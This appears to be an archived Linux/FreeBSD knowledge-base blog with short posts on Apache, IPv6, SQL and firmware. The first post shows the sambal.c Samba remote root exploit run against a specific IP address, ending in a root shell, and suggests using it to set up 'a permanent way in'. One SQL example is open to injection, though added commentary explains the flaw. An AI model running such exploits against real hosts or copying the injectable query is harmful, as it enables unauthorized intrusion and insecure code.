Linux penetration #1: Samba

http://base.fujang.dk/files/mike/sambal.c
Taken from: http://www.greyhat.org/exploits/2003/april/sambal.c

peanut# ./sambal -b 0 -v 80.196.128.94
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
————————————————————–
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Recieved a non session message
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Recieved a non session message
+ Recieved a non session message
+ Worked!
————————————————————–
*** JE MOET JE MUIL HOUWE
Linux ricecrispy 2.4.20 #2 Mon Mar 17 22:02:15 PST 2003 i686 unknown
uid=0(root) gid=0(root) groups=99(nogroup),98(nobody)

Now you have a ghost shell: you can type commands and send keystrokes to it, but it won't act like a regular terminal. It is enough for creating a permanent way in, though.

Posted in Exploits, Knowledge Base, Old Base

Upgrade orinoco silver -> gold

By padde

<padde> mike_: actually you can put a new firmware on your card, so it becomes a gold.
<padde> mike_: http://beastie.dk/tmp/128bit_flash_810.zip 😉
http://beastie.dk/tmp/128_driver_orinoco742.zip

Posted in Hardware hacking, Knowledge Base, Old Base

How to search in sql databases.

To find cells that contain a specific word, you can use the following line in SQL.

"select * from tabel where felt like \"%$variable%\" order by felt"

// Vladimirr – Vladimirr.dk

Posted in Knowledge Base, Lamp, Old Base, SQL
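
The one-liner above pastes $variable straight into the SQL text, so a quote in the search word changes the query and % or _ in it act as wildcards. An added example (not code from the original post), written in Python against an in-memory SQLite database so it runs stand-alone; the "!" escape character, the function names and the sample rows are assumptions made for the illustration:

```python
import sqlite3


def like_pattern(term, escape="!"):
    """Wrap a user term in %...% with the LIKE metacharacters escaped."""
    # Escape the escape character first so the escapes added next stay single.
    for ch in (escape, "%", "_"):
        term = term.replace(ch, escape + ch)
    return "%" + term + "%"


def search_unsafe(db, term):
    # Same shape as the one-liner above: the value becomes part of the SQL text.
    # (Single quotes are used here; the weakness is the same with \"...\".)
    sql = "select felt from tabel where felt like '%" + term + "%' order by felt"
    return [row[0] for row in db.execute(sql)]


def search_safe(db, term):
    # The value travels as a bound parameter and is never parsed as SQL.
    sql = "select felt from tabel where felt like ? escape '!' order by felt"
    return [row[0] for row in db.execute(sql, (like_pattern(term),))]


def demo_db():
    # Constructed sample data, using the post's table and column names.
    db = sqlite3.connect(":memory:")
    db.execute("create table tabel (felt text)")
    db.executemany(
        "insert into tabel values (?)",
        [("samba notes",), ("apache vhost",), ("100% done",), ("ipv6 router",)],
    )
    return db


if __name__ == "__main__":
    db = demo_db()
    hostile = "zzz' or 'a' like 'a"   # constructed input containing a quote
    print("unsafe:", search_unsafe(db, hostile))   # condition rewritten, all rows
    print("safe:  ", search_safe(db, hostile))     # treated as plain text, no rows
    print("safe %:", search_safe(db, "%"))         # literal percent sign only
```

The same two steps carry over to any database driver with bound parameters: bind the value, and escape the LIKE wildcards before adding the surrounding % signs.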

How to disable xscreensaver black screen

use: xset s off

If you want to learn more, please refer to "man xset"

// Vladimirr - Vladimirr.dk

Posted in Knowledge Base

Net radio stations

boogie mplayer mms://drlive.dr.dk/e06ch1kb64
electric mplayer mms://drlive.dr.dk/e05ch2kb64
ghetto mplayer mms://drlive.dr.dk/e05ch1kb64
klasisk mplayer mms://drlive.dr.dk/e06ch2kb64
p1 mplayer mms://drlive.dr.dk/e07ch1kb64
p3 mplayer mms://drlive.dr.dk/e07ch2kb64
di mplayer http://160.79.1.141:8780

Posted in Knowledge Base, Links, Old Base

Hacking apache2 header-version

The version header is defined in ./include/ap_release.h in the apache2 source tree. If you want to limit the amount of information it gives away, there is an option for that in httpd.conf.

More info later if required

Posted in Apache, Knowledge Base, Old Base
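
The httpd.conf option in question is ServerTokens, with ServerSignature controlling the footer on server-generated pages. An added example (not from the original post) that audits a configuration text for both and shows the shape of the resulting Server header; the function names, the sample configurations and the version strings are assumptions made for the illustration:

```python
import re

# Shape of the Server response header for each ServerTokens level.
# The version strings are illustrative sample values, not from the page.
HEADER_BY_TOKENS = {
    "prod": "Apache",
    "major": "Apache/2",
    "minor": "Apache/2.0",
    "min": "Apache/2.0.41",
    "os": "Apache/2.0.41 (Unix)",
    "full": "Apache/2.0.41 (Unix) PHP/4.2.2 MyMod/1.2",
}
ALIASES = {"productonly": "prod", "minimal": "min"}


def directive_values(conf, name):
    """Return every value given for a directive, in file order, skipping comments."""
    values = []
    for line in conf.splitlines():
        line = line.strip()
        if line.startswith("#"):
            continue
        m = re.match(rf"{name}\s+(\S+)", line, re.IGNORECASE)
        if m:
            value = m.group(1).strip('"').lower()
            values.append(ALIASES.get(value, value))
    return values


def audit(conf):
    """Return (server_header_shape, findings) for an httpd.conf text."""
    # Assumption: the last ServerTokens line wins; Apache's default is Full.
    tokens = (directive_values(conf, "ServerTokens") or ["full"])[-1]
    findings = []
    if tokens != "prod":
        findings.append(f"ServerTokens {tokens}: header exposes more than the product name")
    # ServerSignature defaults to Off; On or EMail adds an identification footer.
    if any(v != "off" for v in directive_values(conf, "ServerSignature")):
        findings.append("ServerSignature enabled: footer on server-generated pages")
    return HEADER_BY_TOKENS.get(tokens, "unknown"), findings


# Constructed sample configurations: a commented-out directive has no effect.
WEAK = "# ServerTokens Prod\nServerSignature On\n"
HARDENED = "ServerTokens Prod\nServerSignature Off\n"

if __name__ == "__main__":
    for label, conf in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit(conf))
```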

Virtualhosts in apache

To activate virtual hosts, add this at the end of httpd.conf:

NameVirtualHost *

After that you can add virtual hosts with this syntax; just make sure the DNS names point to your server's IP:

<VirtualHost *>
    Documentroot /home/subdomain
    ServerName subdomain.cyberfamily.dk
    Serveralias www.subdomain.cyberfamily.dk
    ScriptAlias /cgi-bin/ "/home/subdomain/cgi-bin/"
</VirtualHost>

DocumentRoot: tells Apache where the .html files will be
ServerName: tells Apache what name it should call itself when a user requests a page from the virtual domain
ServerAlias: tells Apache an alias for the vhost, for instance www.
ScriptAlias: tells Apache where to find CGI scripts for the vhost

Posted in Apache, Knowledge Base, Old Base

FreeBSD ipv6 client

Assuming your router is working correctly with the IP 3ffe:80ee:5f8::1 and a /64 range.

 * Give the interface "wi0" the IP 3ffe:80ee:5f8::2 with CIDR prefix 64
ifconfig wi0 inet6 3ffe:80ee:5f8::2 prefixlen 64

 * Add the default IPv6 gateway
route add -inet6 default 3ffe:80ee:5f8::1


And you're on.



To automate this with the init scripts, put this in rc.conf:
ipv6_enable="YES"
ipv6_ifconfig_wi0="3ffe:80ee:5f8::2 prefixlen 64"
ipv6_defaultrouter="3ffe:80ee:5f8::1"

If you're on PCMCIA you should put them in /etc/start_if.wi0 instead and hack your rc.netw

Add the bold line.

        # Set up any static routes.
        case ${ipv6_defaultrouter} in
        [Nn][Oo] | '')
                ;;
        *)
                ipv6_static_routes="default ${ipv6_static_routes}"
                ipv6_route_default="default ${ipv6_defaultrouter}"
                ;;
        esac

Posted in FreeBSD, Knowledge Base, Networking, Old Base

IPv6 router under FreeBSD

First set up native IPv6 for the router (mostly done by tunneling).

XS26.net's script:

#!/bin/sh
#MYIPv4="80.196.157.241" # My IPv4 address
#XSIPv4="62.61.157.209" # PoP's IPv4 address
#MYIPv6="3ffe:80ee:5f8::1" # Choose any IPv6 address from the range
# you've got from XS26
##TUNLIF="gif0"

ifconfig gif0 create tunnel 80.196.157.241 62.61.157.209 up
route add -inet6 default -interface gif0
ifconfig lo0 inet6 3ffe:80ee:5f8::1 prefixlen 128

Then we need to compile firewall support for IPv6 into the kernel; add these options and rebuild the kernel:

options IPV6FIREWALL
options IPV6FIREWALL_VERBOSE

By default everything is disallowed, so to allow everything, type the following (IMPORTANT: just because almost nobody uses IPv6, you can't drop security here, so you have to come back later and set up a proper firewall):

ip6fw add accept all from any to any

Our local IPv6 is now running. To share it, the local machines first have to be able to talk to each other through IPv6; to do this, the local interface has to have an IPv6 address:

ifconfig rl0 inet6 3ffe:80ee:5f8::1 prefixlen 64

Note that this is the same IP as the machine has on the global interface, but here with a 64-bit prefix instead, meaning that the network 3ffe:80ee:5f8:: can be reached through this interface.

Then enable routing by typing:
sysctl net.inet6.ip6.forwarding=1

Now it should be running. This can be done automatically by a dirty little quick hack in your init scripts, or you can try to figure out how to do as much as possible of it from the standard init scripts.

This works in a pure setup; if you mix it with other technologies you might encounter odd problems which require new thinking.

Posted in FreeBSD, Knowledge Base, Networking, Old Base